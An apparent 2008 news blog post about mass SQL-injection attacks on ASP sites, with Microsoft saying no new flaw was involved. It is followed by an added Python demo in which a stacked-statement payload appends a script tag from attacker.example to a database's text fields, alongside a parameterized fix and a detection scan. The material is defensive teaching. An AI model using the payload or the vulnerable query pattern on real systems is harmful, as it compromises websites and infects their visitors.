
Massive SQL-injection attack not Microsoft's fault, security official says

By Microsoft Subnet on Mon, 04/28/08 - 7:02pm.

F-Secure found evidence of yet another massive round of infected Web sites on Thursday, all compromised by SQL injection attacks. Many pundits in the blogosphere were quick to blame Microsoft IIS and/or SQL Server, and so Bill Sisk from the Microsoft Security Team posted a blog entry late Friday evening in response. Sisk insists that no new vulnerabilities were found. He also says that better coding practices on the part of developers are what is needed to prevent this kind of attack.

Essentially this kind of attack turns a legitimate site into a redirector to malicious Web sites. Sites that use a database back-end (and there are more and more of them these days) are vulnerable if they build SQL statements from user-supplied values without parameterizing the query. That input does not have to be content a visitor posts to a discussion forum, blog or feedback form; as F-Secure describes below, a plain querystring parameter such as an article ID is enough. Therefore, developers need to make sure user input can never alter the SQL their pages run, and they should also check that the information stored in, or requested from, their databases is not sending visitors to infected Web pages. According to F-Secure, the SQL injection code:

"finds all text fields in the database and adds a link to malicious JavaScript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code."

Sisk's reply stated, "The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies." Sisk points developers to a white paper written in May 2005 that explains how to avoid SQL injection attacks.
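The vulnerable pattern F-Secure describes and the coding fix Sisk points to, shown as an added example that is not from the original post, F-Secure or Microsoft. It is Python against an in-memory SQLite database standing in for the site's SQL Server back-end; the table, its rows, the attacker.example URL and the payload are all constructed for the demonstration. The payload here hits one known table, whereas per F-Secure the real attack walked the database catalogue to reach every text field; the defensive scan below borrows that same catalogue walk to find tainted rows.

```python
import re
import sqlite3

# Constructed sample data standing in for a site's database back-end.
SAMPLE_ROWS = [
    (1, "Welcome", "First post on the new site."),
    (2, "Product news", "Version 2 ships next week."),
]

# Hypothetical attacker host; the tag is what the attack appends to text fields.
MALICIOUS_TAG = '<script src="http://attacker.example/x.js"></script>'


def make_db():
    """Fresh in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_query(conn, raw_id):
    """The classic ASP pattern: the querystring value is pasted into the SQL
    text. ADO on SQL Server runs that text as a batch, so a second statement
    after a ';' executes as well; executescript() models that behaviour here.
    Returns the SQL that was actually run so it can be inspected."""
    sql = "SELECT title, body FROM articles WHERE id = " + raw_id
    conn.executescript(sql)
    return sql


def safe_lookup(conn, raw_id):
    """Hardened version: validate the parameter's shape, then bind it.
    The value never becomes part of the SQL text, so it cannot add statements."""
    if not re.fullmatch(r"\d{1,9}", raw_id):
        raise ValueError("article id must be a small positive integer")
    return conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (int(raw_id),)).fetchall()


def find_injected_rows(conn, needle="<script"):
    """Defensive scan: walk the catalogue for every TEXT column and report rows
    containing the needle. This is the same catalogue walk the attackers used
    to find text fields, turned around for detection and clean-up."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f"PRAGMA table_info({table})")
                if r[2].upper() == "TEXT"]
        for col in cols:
            # Names come from the catalogue, not from users; the needle is bound.
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE instr("{col}", ?) > 0',
                (needle,))
            hits.extend((table, col, r[0]) for r in rows)
    return hits


def render_article(conn, article_id):
    """What the page emits. The stored text is placed in the HTML verbatim,
    which is why an injected tag is 'displayed automatically'."""
    title, body = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)).fetchone()
    return f"<h1>{title}</h1><p>{body}</p>"


def demo():
    """Run the attack against both page versions and report what happened."""
    conn = make_db()
    # Stacked-statement payload. SQLite concatenates with ||; T-SQL uses +.
    payload = ("1; UPDATE articles SET title = title || '" + MALICIOUS_TAG
               + "', body = body || '" + MALICIOUS_TAG + "'")
    clean_before = len(find_injected_rows(conn)) == 0

    try:                       # the hardened page refuses the value outright
        safe_lookup(conn, payload)
        refused = False
    except ValueError:
        refused = True

    vulnerable_query(conn, payload)   # the vulnerable page runs the whole batch
    hits = find_injected_rows(conn)
    page = render_article(conn, 1)
    return {
        "clean_before": clean_before,
        "refused": refused,
        "tainted_fields": len(hits),
        "script_in_page": MALICIOUS_TAG in page,
    }


if __name__ == "__main__":
    print(demo())
```

Two things carry over to the real platform. On SQL Server the catalogue walk in find_injected_rows maps to INFORMATION_SCHEMA.COLUMNS, and a LIKE '%<script%' over each text column is the quickest way to find out whether a site is already carrying the injected tag. And even with parameterized queries in place, HTML-encoding database values before they reach the page (html.escape in Python, Server.HTMLEncode in ASP) means a row that does get tainted by some other route is shown as harmless text rather than executed in the visitor's browser.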
